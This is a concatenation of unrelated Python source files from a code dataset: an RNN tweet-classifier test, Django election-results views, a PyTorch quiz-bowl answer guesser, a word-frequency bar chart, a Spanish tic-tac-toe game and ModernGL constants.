open(r\"..\\..\\model\\en\\rnn_tokenizer\", 'rb') as handle:\n tokenize = pickle.load(handle)\n\nx_test = tokenize.texts_to_matrix(test_posts)\n\ntest_posts = df['tweet']\ntest_tags = df['label']\n\n\nencoder = LabelEncoder()\nencoder.fit(test_tags)\ny_test = encoder.transform(test_tags)\nnum_classes = np.max(y_test) + 1\ny_test = utils.to_categorical(y_test, num_classes)\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\n\ny_pred = model.predict(x_test)\n\nfor i in range(len(y_test)):\n if(y_pred[i][0] > y_pred[i][1]):\n y_pred[i][0] = 1\n y_pred[i][1] = 0\n else:\n y_pred[i][0] = 0\n y_pred[i][1] = 1\n\nprint(encoder.inverse_transform([0]))\nprint(encoder.inverse_transform([1]))\nprint(y_pred[:10])\nprint(y_test[:10])\nprint('accuracy %s' % accuracy_score(y_pred, y_test))\nprint(classification_report(y_test, y_pred))\n","sub_path":"src/main/python/tests/en/RNN_test.py","file_name":"RNN_test.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"191600844","text":"\"\"\"voting views.\"\"\"\n\n# pylint: disable=too-many-ancestors\n\nimport datetime\nimport email\n\nfrom django.db.models import Q\nfrom django.http import Http404, HttpResponse\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.utils import timezone\nfrom django.views.generic import DetailView, ListView\n\nfrom .models import Election, Statement, Votetaker\n\n\ndef home(request):\n \"\"\"Display the home page.\"\"\"\n return render(request, \"voting/home.html\", {})\n\n\ndef votetakers(request):\n \"\"\"List the votetakers.\"\"\"\n return render(\n request, \"voting/votetakers.html\", {\n \"active_votetakers\":\n Votetaker.objects.filter(user__is_active=True),\n \"retired_votetakers\":\n Votetaker.objects.filter(user__is_active=False),\n }\n )\n\n\nclass StatementList(ListView):\n \"\"\"List the statements.\"\"\"\n model = Statement\n\n\nclass StatementView(DetailView):\n \"\"\"View a statement.\"\"\"\n model = Statement\n\n def get_object(self, queryset=None):\n if queryset is None:\n queryset = self.get_queryset()\n try:\n return queryset.get(\n release_date=self.kwargs[\"release_date\"],\n slug=self.kwargs[\"slug\"],\n )\n except Statement.DoesNotExist:\n raise Http404(\"Statement not found\")\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n message = email.message_from_string(self.object.statement)\n context[\"message\"] = message\n context[\"body\"] = message.get_payload()\n return context\n\n\ndef statement_raw(request, release_date=None, slug=None):\n \"\"\"Return the raw text of a statement.\"\"\"\n return HttpResponse(\n get_object_or_404(\n Statement,\n release_date=release_date,\n slug=slug\n ).statement,\n content_type=\"text/plain; charset=utf-8\"\n )\n\n\ndef statement_by_msgid(request, msgid=None):\n \"\"\"Return a redirect to the proper URL for a statement.\"\"\"\n if msgid.endswith(\".txt\"):\n msgid = msgid[:-4]\n msgid = \"<\" + msgid + \">\"\n return redirect(\n get_object_or_404(Statement, msgid=msgid).get_raw_url(),\n permanent=True\n )\n\n\nclass ResultList(ListView):\n \"\"\"List the election results.\"\"\"\n model = Election\n template_name = \"voting/result_list.html\"\n\n def get_queryset(self):\n queryset = Election.objects.filter(status=Election.RESULT).exclude(\n hidden=True).order_by(\"-result_date\")\n if \"non-uk\" in self.request.GET:\n queryset = queryset.exclude(uk_vote=True)\n 
else:\n queryset = queryset.exclude(uk_vote=False)\n if self.request.GET.get(\"votetaker\", None):\n queryset = queryset.filter(\n votetaker__user__username=self.request.GET[\"votetaker\"])\n queryset = queryset.defer(\"proposal\", \"cfv\")\n queryset = queryset.select_related(\"votetaker\", \"votetaker__user\")\n return queryset\n\n\nclass ResultView(DetailView):\n \"\"\"View an election result.\"\"\"\n model = Election\n template_name = \"voting/result_detail.html\"\n\n def get_object(self, queryset=None):\n if queryset is None:\n queryset = self.get_queryset()\n queryset = queryset.filter(status=Election.RESULT)\n try:\n if self.kwargs[\"key\"].isdigit():\n return queryset.get(id=int(self.kwargs[\"key\"]))\n return queryset.get(shortname=self.kwargs[\"key\"])\n except Election.DoesNotExist:\n raise Http404(\"Election result not found\")\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n message = email.message_from_string(self.object.result)\n context[\"message\"] = message\n context[\"body\"] = message.get_payload()\n return context\n\n\ndef result_by_msgid(request, msgid=None):\n \"\"\"Return a redirect to the proper URL for a result.\"\"\"\n if msgid.endswith(\".txt\"):\n msgid = msgid[:-4]\n msgid = \"<\" + msgid + \">\"\n return redirect(\n get_object_or_404(Election, status=Election.RESULT,\n result_msgid=msgid).get_raw_result_url(),\n permanent=True\n )\n\n\ndef result_raw(request, key=None):\n \"\"\"Return the raw text of a statement.\"\"\"\n if key.isdigit():\n result = get_object_or_404(Election, status=Election.RESULT,\n id=key).result\n else:\n result = get_object_or_404(Election, status=Election.RESULT,\n shortname=key).result\n return HttpResponse(result, content_type=\"text/plain; charset=utf-8\")\n\n\ndef missing(request):\n \"\"\"View the list of missing files.\"\"\"\n cutoff = (datetime.datetime.now() - datetime.timedelta(days=20)).date()\n results = Election.objects.exclude(hidden=True).exclude(\n result_date__gte=cutoff).filter(\n result=\"\", status=Election.RESULT).order_by(\"-result_date\")\n cfvs = Election.objects.exclude(hidden=True).exclude(\n cfv_date__gte=cutoff).filter(\n cfv=\"\", status__in=(Election.ACTIVE, Election.COUNT,\n Election.RESULT)).order_by(\n \"-cfv_date\", \"-result_date\")\n return render(\n request, \"voting/missing.html\", {\n \"results\": results,\n \"cfvs\": cfvs,\n }\n )\n\n\ndef status(request):\n \"\"\"View the list of currently-active CFVs.\"\"\"\n today = timezone.now().date()\n count = Election.objects.exclude(hidden=True).filter(\n Q(status=Election.COUNT) | Q(\n status=Election.ACTIVE, cfv_end_date__lt=today)\n ).order_by(\"-cfv_end_date\")\n active = Election.objects.exclude(hidden=True).filter(\n status=Election.ACTIVE, cfv_end_date__gte=today\n ).order_by(\"-cfv_end_date\")\n setup = Election.objects.exclude(hidden=True).filter(\n status=Election.SETUP)\n return render(\n request, \"voting/status.html\", {\n \"count\": count,\n \"active\": active,\n \"setup\": setup,\n }\n )\n\n\ndef pgpkeys(request):\n \"\"\"View the list of votetakers' PGP keys.\"\"\"\n return render(\n request, \"voting/pgpkeys.html\", {\n \"votetakers\": Votetaker.objects.filter(\n user__is_active=True).exclude(pgpkey=\"\"),\n }\n )\n","sub_path":"voting/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"628290469","text":"import re\nimport os\nimport shutil\nimport time\nimport 
pickle\nfrom typing import List, Optional, Dict\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\nfrom torch.optim import Adam, lr_scheduler\n\nfrom torchtext.data.field import Field\nfrom torchtext.data.iterator import Iterator\n\nfrom qanta import qlogging\nfrom qanta.torch.dataset import QuizBowl\nfrom qanta.config import conf\nfrom qanta.guesser.abstract import AbstractGuesser\nfrom qanta.datasets.abstract import QuestionText\nfrom qanta.torch import (\n BaseLogger, TerminateOnNaN, EarlyStopping, ModelCheckpoint,\n MaxEpochStopping, TrainingManager\n)\n\n\nlog = qlogging.get(__name__)\n\n\nCUDA = torch.cuda.is_available()\n\n\ndef create_save_model(model):\n def save_model(path):\n torch.save(model.state_dict(), path)\n return save_model\n\n\n\nqb_patterns = {\n '\\n',\n ', for 10 points,',\n ', for ten points,',\n '--for 10 points--',\n 'for 10 points, ',\n 'for 10 points--',\n 'for ten points, ',\n 'for 10 points ',\n 'for ten points ',\n ', ftp,'\n 'ftp,',\n 'ftp',\n '(*)'\n}\nre_pattern = '|'.join([re.escape(p) for p in qb_patterns])\nre_pattern += r'|\\[.*?\\]|\\(.*?\\)'\n\n\nclass DanEncoder(nn.Module):\n def __init__(self, embedding_dim, n_hidden_layers, n_hidden_units, dropout_prob):\n super(DanEncoder, self).__init__()\n encoder_layers = []\n for i in range(n_hidden_layers):\n if i == 0:\n input_dim = embedding_dim\n else:\n input_dim = n_hidden_units\n\n encoder_layers.extend([\n nn.Linear(input_dim, n_hidden_units),\n nn.BatchNorm1d(n_hidden_units),\n nn.ELU(),\n nn.Dropout(dropout_prob),\n ])\n self.encoder = nn.Sequential(*encoder_layers)\n\n def forward(self, x_array):\n return self.encoder(x_array)\n\n\nclass TiedModel(nn.Module):\n def __init__(self, text_field: Field, n_classes,\n init_embeddings=True, emb_dim=300,\n n_hidden_units=1000, n_hidden_layers=1, nn_dropout=.265, sm_dropout=.158):\n super(TiedModel, self).__init__()\n vocab = text_field.vocab\n self.vocab_size = len(vocab)\n self.emb_dim = emb_dim\n self.n_classes = n_classes\n self.n_hidden_units = n_hidden_units\n self.n_hidden_layers = n_hidden_layers\n self.nn_dropout = nn_dropout\n self.sm_dropout = sm_dropout\n\n self.dropout = nn.Dropout(nn_dropout)\n pad_idx = vocab.stoi[text_field.pad_token]\n self.general_embeddings = nn.Embedding(self.vocab_size, emb_dim, padding_idx=pad_idx)\n self.qb_embeddings = nn.Embedding(self.vocab_size, emb_dim, padding_idx=pad_idx)\n self.wiki_embeddings = nn.Embedding(self.vocab_size, emb_dim, padding_idx=pad_idx)\n qb_mask = torch.cat([torch.ones(1, 600), torch.zeros(1, 300)], dim=1)\n wiki_mask = torch.cat([torch.ones(1, 300), torch.zeros(1, 300), torch.ones(1, 300)], dim=1)\n self.combined_mask = torch.cat([qb_mask, wiki_mask], dim=0).float().cuda()\n\n if init_embeddings:\n mean_emb = vocab.vectors.mean(0)\n vocab.vectors[vocab.stoi[text_field.unk_token]] = mean_emb\n self.general_embeddings.weight.data = vocab.vectors.cuda()\n self.qb_embeddings.weight.data = vocab.vectors.cuda()\n self.wiki_embeddings.weight.data = vocab.vectors.cuda()\n\n # One averaged embedding for each of general, qb, and wiki\n self.encoder = DanEncoder(3 * emb_dim, self.n_hidden_layers, self.n_hidden_units, self.nn_dropout)\n self.classifier = nn.Sequential(\n nn.Linear(self.n_hidden_units, n_classes),\n nn.BatchNorm1d(n_classes),\n nn.Dropout(self.sm_dropout)\n )\n\n def forward(self, input_: Variable, lengths, qnums):\n \"\"\"\n :param input_: [batch_size, seq_len] of word indices\n :param lengths: Length 
of each example\n :param qnums: QB qnum if a qb question, otherwise -1 for wikipedia, used to get domain as source/target\n :return:\n \"\"\"\n if not isinstance(lengths, Variable):\n lengths = Variable(lengths.float(), volatile=not self.training)\n\n g_embed = self.general_embeddings(input_)\n g_embed = g_embed.sum(1) / lengths.float().view(input_.size()[0], -1)\n g_embed = self.dropout(g_embed)\n\n qb_embed = self.qb_embeddings(input_)\n qb_embed = qb_embed.sum(1) / lengths.float().view(input_.size()[0], -1)\n qb_embed = self.dropout(qb_embed)\n\n wiki_embed = self.wiki_embeddings(input_)\n wiki_embed = wiki_embed.sum(1) / lengths.float().view(input_.size()[0], -1)\n wiki_embed = self.dropout(wiki_embed)\n\n # Need to use qnum to mask either qb or wiki embeddings here\n concat_embed = torch.cat([g_embed, qb_embed, wiki_embed], dim=1)\n mask = Variable(self.combined_mask[(qnums < 0).long()])\n masked_embed = concat_embed * mask\n\n encoded = self.encoder(masked_embed)\n return self.classifier(encoded)\n\n\nclass TiedGuesser(AbstractGuesser):\n def __init__(self):\n super(TiedGuesser, self).__init__()\n guesser_conf = conf['guessers']['Tied']\n self.gradient_clip = guesser_conf['gradient_clip']\n self.n_hidden_units = guesser_conf['n_hidden_units']\n self.n_hidden_layers = guesser_conf['n_hidden_layers']\n self.lr = guesser_conf['lr']\n self.nn_dropout = guesser_conf['nn_dropout']\n self.sm_dropout = guesser_conf['sm_dropout']\n self.batch_size = guesser_conf['batch_size']\n self.use_wiki = guesser_conf['use_wiki']\n self.n_wiki_sentences = guesser_conf['n_wiki_sentences']\n self.wiki_title_replace_token = guesser_conf['wiki_title_replace_token']\n self.lowercase = guesser_conf['lowercase']\n self.tied_l2 = guesser_conf['tied_l2']\n self.encoder_type = guesser_conf['encoder_type']\n\n self.page_field: Optional[Field] = None\n self.qnum_field: Optional[Field] = None\n self.text_field: Optional[Field] = None\n self.n_classes = None\n self.emb_dim = None\n self.kuro_trial_id = None\n\n self.model = None\n self.optimizer = None\n self.criterion = None\n self.scheduler = None\n\n @property\n def ans_to_i(self):\n return self.page_field.vocab.stoi\n\n @property\n def i_to_ans(self):\n return self.page_field.vocab.itos\n\n def parameters(self):\n params = conf['guessers']['Tied'].copy()\n params['kuro_trial_id'] = self.kuro_trial_id\n return params\n\n def train(self, training_data):\n log.info('Loading Quiz Bowl dataset')\n train_iter, val_iter, dev_iter = QuizBowl.iters(\n batch_size=self.batch_size, lower=self.lowercase,\n use_wiki=self.use_wiki, n_wiki_sentences=self.n_wiki_sentences,\n replace_title_mentions=self.wiki_title_replace_token\n )\n log.info(f'N Train={len(train_iter.dataset.examples)}')\n log.info(f'N Test={len(val_iter.dataset.examples)}')\n fields: Dict[str, Field] = train_iter.dataset.fields\n self.page_field = fields['page']\n self.n_classes = len(self.ans_to_i)\n self.qnum_field = fields['qnum']\n self.text_field = fields['text']\n self.emb_dim = self.text_field.vocab.vectors.shape[1]\n log.info(f'Vocab={len(self.text_field.vocab)}')\n\n log.info('Initializing Model')\n self.model = TiedModel(\n self.text_field, self.n_classes, emb_dim=self.emb_dim,\n n_hidden_units=self.n_hidden_units, n_hidden_layers=self.n_hidden_layers,\n nn_dropout=self.nn_dropout, sm_dropout=self.sm_dropout\n )\n if CUDA:\n self.model = self.model.cuda()\n log.info(f'Parameters:\\n{self.parameters()}')\n log.info(f'Model:\\n{self.model}')\n self.optimizer = Adam(self.model.parameters(), lr=self.lr)\n 
self.criterion = nn.CrossEntropyLoss()\n self.scheduler = lr_scheduler.ReduceLROnPlateau(self.optimizer, patience=5, verbose=True, mode='max')\n\n manager = TrainingManager([\n BaseLogger(log_func=log.info), TerminateOnNaN(), EarlyStopping(monitor='test_acc', patience=10, verbose=1),\n MaxEpochStopping(100), ModelCheckpoint(create_save_model(self.model), '/tmp/tied.pt', monitor='test_acc')\n ])\n\n log.info('Starting training')\n try:\n import socket\n from kuro import Worker\n worker = Worker(socket.gethostname())\n experiment = worker.experiment(\n 'guesser', 'Tied', hyper_parameters=conf['guessers']['Tied'],\n metrics=[\n 'train_acc', 'train_loss', 'test_acc', 'test_loss'\n ], n_trials=5\n )\n trial = experiment.trial()\n if trial is not None:\n self.kuro_trial_id = trial.id\n except ModuleNotFoundError:\n trial = None\n\n epoch = 0\n while True:\n self.model.train()\n train_acc, train_loss, train_time = self.run_epoch(train_iter)\n\n self.model.eval()\n test_acc, test_loss, test_time = self.run_epoch(val_iter)\n\n stop_training, reasons = manager.instruct(\n train_time, train_loss, train_acc,\n test_time, test_loss, test_acc\n )\n\n if trial is not None:\n trial.report_metric('test_acc', test_acc, step=epoch)\n trial.report_metric('test_loss', test_loss, step=epoch)\n trial.report_metric('train_acc', train_acc, step=epoch)\n trial.report_metric('train_loss', train_loss, step=epoch)\n\n if stop_training:\n log.info(' '.join(reasons))\n break\n else:\n self.scheduler.step(test_acc)\n epoch += 1\n\n def run_epoch(self, iterator: Iterator):\n is_train = iterator.train\n batch_accuracies = []\n batch_losses = []\n epoch_start = time.time()\n for batch in iterator:\n text, lengths = batch.text\n page = batch.page\n qnums = batch.qnum.cuda()\n\n if is_train:\n self.model.zero_grad()\n\n out = self.model(text, lengths, qnums)\n _, preds = torch.max(out, 1)\n accuracy = torch.mean(torch.eq(preds, page).float()).data[0]\n batch_loss = self.criterion(out, page)\n if self.tied_l2 != 0:\n w_general = self.model.general_embeddings.weight\n w_source = self.model.wiki_embeddings.weight\n w_target = self.model.qb_embeddings.weight\n tied_weight_l2 = self.tied_l2 / 2 * (\n (w_general ** 2).sum() +\n ((w_source - w_general) ** 2).sum() +\n ((w_target - w_general) ** 2).sum()\n )\n batch_loss += tied_weight_l2\n if is_train:\n batch_loss.backward()\n torch.nn.utils.clip_grad_norm(self.model.parameters(), self.gradient_clip)\n self.optimizer.step()\n\n batch_accuracies.append(accuracy)\n batch_losses.append(batch_loss.data[0])\n\n epoch_end = time.time()\n\n return np.mean(batch_accuracies), np.mean(batch_losses), epoch_end - epoch_start\n\n def guess(self, questions: List[QuestionText], max_n_guesses: Optional[int]):\n examples = [self.text_field.preprocess(q) for q in questions]\n text, lengths = self.text_field.process(examples, None, False)\n qnums = self.qnum_field.process([0 for _ in questions]).cuda()\n guesses = []\n out = self.model(text, lengths, qnums)\n probs = F.softmax(out)\n scores, preds = torch.max(probs, 1)\n scores = scores.data.cpu().numpy()\n preds = preds.data.cpu().numpy()\n\n for p, s in zip(preds, scores):\n guesses.append([(self.i_to_ans[p], s)])\n\n return guesses\n\n def save(self, directory: str):\n shutil.copyfile('/tmp/tied.pt', os.path.join(directory, 'tied.pt'))\n with open(os.path.join(directory, 'tied.pkl'), 'wb') as f:\n pickle.dump({\n 'page_field': self.page_field,\n 'text_field': self.text_field,\n 'qnum_field': self.qnum_field,\n 'n_classes': self.n_classes,\n 
'emb_dim': self.emb_dim,\n 'gradient_clip': self.gradient_clip,\n 'n_hidden_units': self.n_hidden_units,\n 'n_hidden_layers': self.n_hidden_layers,\n 'lr': self.lr,\n 'nn_dropout': self.nn_dropout,\n 'sm_dropout': self.sm_dropout,\n 'batch_size': self.batch_size,\n 'use_wiki': self.use_wiki,\n 'n_wiki_sentences': self.n_wiki_sentences,\n 'wiki_title_replace_token': self.wiki_title_replace_token,\n 'lowercase': self.lowercase,\n 'tied_l2': self.tied_l2,\n 'encoder_type': self.encoder_type\n }, f)\n\n @classmethod\n def load(cls, directory: str):\n with open(os.path.join(directory, 'tied.pkl'), 'rb') as f:\n params = pickle.load(f)\n\n guesser = TiedGuesser()\n guesser.page_field = params['page_field']\n guesser.text_field = params['text_field']\n guesser.qnum_field = params['qnum_field']\n guesser.n_classes = params['n_classes']\n guesser.emb_dim = params['emb_dim']\n guesser.gradient_clip = params['gradient_clip']\n guesser.n_hidden_units = params['n_hidden_units']\n guesser.n_hidden_layers = params['n_hidden_layers']\n guesser.lr = params['lr']\n guesser.nn_dropout = params['nn_dropout']\n guesser.sm_dropout = params['sm_dropout']\n guesser.use_wiki = params['use_wiki']\n guesser.n_wiki_sentences = params['n_wiki_sentences']\n guesser.wiki_title_replace_token = params['wiki_title_replace_token']\n guesser.lowercase = params['lowercase']\n guesser.tied_l2 = params['tied_l2']\n guesser.encoder_type = params['encoder_type']\n guesser.model = TiedModel(\n guesser.text_field, guesser.n_classes,\n init_embeddings=False, emb_dim=guesser.emb_dim\n )\n guesser.model.load_state_dict(torch.load(\n os.path.join(directory, 'tied.pt'), map_location=lambda storage, loc: storage\n ))\n guesser.model.eval()\n if CUDA:\n guesser.model = guesser.model.cuda()\n return guesser\n\n @classmethod\n def targets(cls):\n return ['tied.pt', 'tied.pkl']\n","sub_path":"qanta/guesser/tied.py","file_name":"tied.py","file_ext":"py","file_size_in_byte":14842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"557222713","text":"# Plot the 10 most frequent words and their frequencies (e.g. as a bar chart).\n\nfrom knock30 import make_morpheme\nfrom collections import defaultdict\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nf = open('neko.txt.mecab', 'r')\nm = make_morpheme(f)\ndic_surface = defaultdict(lambda: 0)\n\nfor i in m:\n if i['pos'] != '記号':\n dic_surface[i['surface']] += 1\n\nf.close()\n\nwords = sorted(dic_surface.items(), key = lambda x:x[1], reverse = True)\nans = np.array([i[1] for i in words[:10]])\nleft = np.array([i[0] for i in words[:10]])\n\n# sanity check\nprint(ans)\nprint(left)\n\nplt.rcParams[\"font.family\"] = \"Hiragino sans\"\nfig = plt.figure()\nax = fig.add_subplot(111, title = '出現頻度の高い単語', ylabel = '頻度', xlabel = '単語')\nplt.bar(left, ans)\nplt.show()","sub_path":"suzuki/chapter04/knock36.py","file_name":"knock36.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"182338279","text":"class CeldaOcupada (Exception):\n def __init__(self):\n Exception.__init__(self, \"la celda esta ocupada\")\n\n\nclass Tablero_Lleno (Exception):\n def __init__(self):\n Exception.__init__(self, \"la tabla esta llena\")\n\n\nclass Jugador_Descalificado (Exception):\n def __init__(self):\n Exception.__init__(self, \"Un jugador ha sido descalificado. 
Partida terminada\")\n\n\n\nclass Jugador:\n def __init__(self,nombre, tipoficha):\n self.__nombre = nombre\n self.__tipo_ficha = tipoficha\n self.__puntuacion = 0\n \n def __str__(self):\n return (self.__nombre + \" \" + self.__tipo_ficha + \" \" + str(self.__puntuacion))\n \n def get_nombre(self) :\n return self.__nombre\n\n def get_tipo_ficha(self):\n return self.__tipo_ficha\n\n def get_puntuacion(self):\n return self.__puntuacion\n\n def actualiza_puntuacion(self):\n self.__puntuacion = self.__puntuacion + 1\n\n\nclass Celda:\n def __init__(self, i, j):\n self.__columna = int(j)\n self.__fila = int(i)\n self.__esta_vacia = True\n self.__ficha = \" \"\n def __str__(self):\n if (self.__esta_vacia):\n return (\" \")\n else:\n return (self.__ficha)\n\n def asignar_ficha(self, ficha):\n if (self.__esta_vacia):\n self.__ficha = ficha\n self.__esta_vacia = False\n else:\n raise CeldaOcupada\n \n def reiniciar_celda(self):\n self.__esta_vacia = True\n self.__ficha = None \n def get_tipo_ficha(self):\n return self.__ficha\n\nclass Tablero:\n def __init__(self):\n self.__ancho = 3\n self.__alto = 3\n self.__matriz_celdas = [] \n self.__numero_fichas = 0\n\n for i in range(self.__alto):\n linea = []\n for j in range(self.__ancho):\n linea.append(Celda(i,j))\n self.__matriz_celdas.append(linea)\n \n\n def __str__(self):\n salida = \"\"\n for linea in self.__matriz_celdas:\n for celda in linea:\n salida = salida + celda.get_tipo_ficha() + \" \"\n salida = salida + \"\\n\" \n return salida\n\n \n\n def poner_ficha(self,i,j,ficha):\n \n if (self.__numero_fichas < self.__ancho*self.__alto):\n self.__matriz_celdas[i][j].asignar_ficha(ficha)\n self.__numero_fichas = self.__numero_fichas + 1\n else:\n raise Tablero_Lleno()\n\n\n def reiniciar_tablero(self):\n self.__numero_fichas = 0\n self.__ganador = None\n for i in range(self.__alto):\n for j in range(self.__ancho):\n self.__matriz_celdas[i][j].reiniciar_ficha() \n \n def hay_tres_en_raya(self):\n ## combinaciones posibles \n posibles = [\"00:01:02\",\"00:11:22\",\"10:11:12\",\"20:21:22\",\"00:10:20\",\"01:11:21\",\"02:12:22\",\"02:11:20\"]\n \n for posible in posibles:\n coordenadas = posible.split(\":\")\n fichas = [] # metemos las fichas de las coordenadas, 3 en total\n \n for cordenada in coordenadas:\n fichas.append(self.__matriz_celdas[int(cordenada[0])][int(cordenada[1])].get_tipo_ficha()) \n ## comprobamos que las fichas sean iguales:\n if ((fichas[0] == fichas[1] and fichas[1] == fichas[2]) and (fichas[1] != \" \" and fichas[0] != \" \" and fichas[2] != \" \")): # hay 3 en hay_tres_en_raya\n self.__ganador = fichas[0]\n return True # devolvemos la ficha ganadora\n return False\n\n def get_numero_de_fichas (self):\n return self.__numero_fichas\n\n def esta_lleno(self):\n return (self.__numero_fichas == 9)\n\nclass Partida:\n def __init__(self):\n self.__partida_terminada = False\n self.__ganador = None\n self.__tablero = Tablero()\n\n # Crear jugadores\n nombre1 = input(\"dame el nombre del Jugador 1 (ficha X)\")\n nombre2 = input(\"dame el nombre del Jugador 2 (ficha O)\")\n\n self.__jugador1 = Jugador(nombre1,\"X\")\n self.__jugador2 = Jugador(nombre2, \"0\")\n\n def reiniciar_partida(self):\n self.__tablero = Tablero()\n self.__partida_terminada = False\n\n def mover_ficha(self, jugador):\n \n numer_max_intentos = 3\n if (isinstance(jugador,Jugador)):\n print (\"jugador \" + jugador.get_nombre() + \" elige celda\")\n intentos = 0\n termina = False\n \n while (not termina and intentos < numer_max_intentos):\n lleno =(Tablero_Lleno)\n 
ocupado = (CeldaOcupada)\n try: \n i = int(input(\"fila\"))\n j = int(input(\"columna\"))\n if (i > 2 or j > 2):\n print(\"has fallado\")\n else:\n self.__tablero.poner_ficha(i,j,jugador.get_tipo_ficha())\n termina = True\n except lleno:\n print(\"HA HABIDO UN EMPATE JAJA SALUDOS\")\n reinicio = input(\"Quieres empezar otra partida S/N\")\n if(reinicio == \"s\"):\n self.reiniciar_partida()\n else:\n self.termina_partida()\n termina = True\n except ocupado:\n print (\"Ha habido un error. Intentalo de nuevo.\")\n finally:\n intentos = intentos + 1\n \n if (intentos == 3): \n # disqualify the player after too many failed attempts\n raise Jugador_Descalificado()\n else:\n raise Exception(\"Error desconocido\")\n \n\n \n\n def set_ganador(self, ganador):\n self.__ganador = ganador\n \n def termina_partida(self):\n self.__partida_terminada = True\n\n\n def imprime_ganador(self):\n print (\"GANADOR\", self.__ganador)\n\n\n def jugar_partida(self):\n while (not(self.__partida_terminada) and not(self.__tablero.hay_tres_en_raya()) and not(self.__tablero.esta_lleno())):\n print(self.__tablero)\n self.mover_ficha(self.__jugador1)\n print(self.__tablero)\n if (self.__tablero.hay_tres_en_raya()):\n self.set_ganador(self.__jugador1)\n self.termina_partida()\n self.imprime_ganador()\n reinicio = input(\"Quieres empezar otra partida S/N\")\n if(reinicio == \"s\"):\n self.reiniciar_partida()\n else:\n self.termina_partida()\n else: # no three-in-a-row yet, so the next player moves\n self.mover_ficha(self.__jugador2)\n if (self.__tablero.hay_tres_en_raya()):\n self.set_ganador(self.__jugador2)\n self.termina_partida()\n self.imprime_ganador()\n reinicio = input(\"Quieres empezar otra partida S/N\")\n if(reinicio == \"s\"):\n self.reiniciar_partida()\n else:\n self.termina_partida()\n\n\ndef main():\n partida = Partida()\n partida.jugar_partida()\n\nif (__name__ == \"__main__\"):\n main()","sub_path":"3enraya.py","file_name":"3enraya.py","file_ext":"py","file_size_in_byte":6349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"401640167","text":"'''\n ModernGL common\n'''\n\n# pylint: disable=too-few-public-methods, using-constant-test\n\ntry:\n from ModernGL import mgl\nexcept ImportError:\n pass\n\n\nif False:\n mgl.BLEND = 'BLEND'\n mgl.DEPTH_TEST = 'DEPTH_TEST'\n mgl.CULL_FACE = 'CULL_FACE'\n mgl.MULTISAMPLE = 'MULTISAMPLE'\n\n mgl.TRIANGLES = 'TRIANGLES'\n mgl.TRIANGLE_STRIP = 'TRIANGLE_STRIP'\n mgl.TRIANGLE_FAN = 'TRIANGLE_FAN'\n mgl.LINES = 'LINES'\n mgl.LINE_STRIP = 'LINE_STRIP'\n mgl.LINE_LOOP = 'LINE_LOOP'\n mgl.POINTS = 'POINTS'\n mgl.LINE_STRIP_ADJACENCY = 'LINE_STRIP_ADJACENCY'\n mgl.LINES_ADJACENCY = 'LINES_ADJACENCY'\n mgl.TRIANGLE_STRIP_ADJACENCY = 'TRIANGLE_STRIP_ADJACENCY'\n mgl.TRIANGLES_ADJACENCY = 'TRIANGLES_ADJACENCY'\n\n mgl.Error = Exception\n\n\nError = mgl.Error\n\n\nclass InvalidObject:\n '''\n A ModernGL object turns into an InvalidObject\n once the ``release()`` method is successfully called.\n '''\n\n\nclass EnableFlag:\n '''\n EnableFlag\n '''\n\n def __init__(self):\n self.mglo = None\n raise NotImplementedError('EnableFlag')\n\n @staticmethod\n def new(obj) -> 'EnableFlag':\n '''\n For internal use only.\n '''\n\n res = EnableFlag.__new__(EnableFlag)\n res.mglo = obj\n return res\n\n\nBLEND = EnableFlag.new(mgl.BLEND)\n'''\n GL_BLEND\n'''\n\nDEPTH_TEST = EnableFlag.new(mgl.DEPTH_TEST)\n'''\n GL_DEPTH_TEST\n'''\n\nCULL_FACE = EnableFlag.new(mgl.CULL_FACE)\n'''\n GL_CULL_FACE\n'''\n\nMULTISAMPLE = 
EnableFlag.new(mgl.MULTISAMPLE)\n'''\n GL_MULTISAMPLE\n'''\n\n\nclass Primitive:\n '''\n Primitive\n '''\n\n def __init__(self):\n self.mglo = None\n raise NotImplementedError('Primitive')\n\n @staticmethod\n def new(obj) -> 'Primitive':\n '''\n For internal use only.\n '''\n\n res = Primitive.__new__(Primitive)\n res.mglo = obj\n return res\n\n\nTRIANGLES = Primitive.new(mgl.TRIANGLES)\n'''\n GL_TRIANGLES\n'''\n\nTRIANGLE_STRIP = Primitive.new(mgl.TRIANGLE_STRIP)\n'''\n GL_TRIANGLE_STRIP\n'''\n\nTRIANGLE_FAN = Primitive.new(mgl.TRIANGLE_FAN)\n'''\n GL_TRIANGLE_FAN\n'''\n\nLINES = Primitive.new(mgl.LINES)\n'''\n GL_LINES\n'''\n\nLINE_STRIP = Primitive.new(mgl.LINE_STRIP)\n'''\n GL_LINE_STRIP\n'''\n\nLINE_LOOP = Primitive.new(mgl.LINE_LOOP)\n'''\n GL_LINE_LOOP\n'''\n\nPOINTS = Primitive.new(mgl.POINTS)\n'''\n GL_POINTS\n'''\n\nLINE_STRIP_ADJACENCY = Primitive.new(mgl.LINE_STRIP_ADJACENCY)\n'''\n GL_LINE_STRIP_ADJACENCY\n'''\n\nLINES_ADJACENCY = Primitive.new(mgl.LINES_ADJACENCY)\n'''\n GL_LINES_ADJACENCY\n'''\n\nTRIANGLE_STRIP_ADJACENCY = Primitive.new(mgl.TRIANGLE_STRIP_ADJACENCY)\n'''\n GL_TRIANGLE_STRIP_ADJACENCY\n'''\n\nTRIANGLES_ADJACENCY = Primitive.new(mgl.TRIANGLES_ADJACENCY)\n'''\n GL_TRIANGLES_ADJACENCY\n'''\n\nPRIMITIVES = {\n mgl.TRIANGLES: TRIANGLES,\n 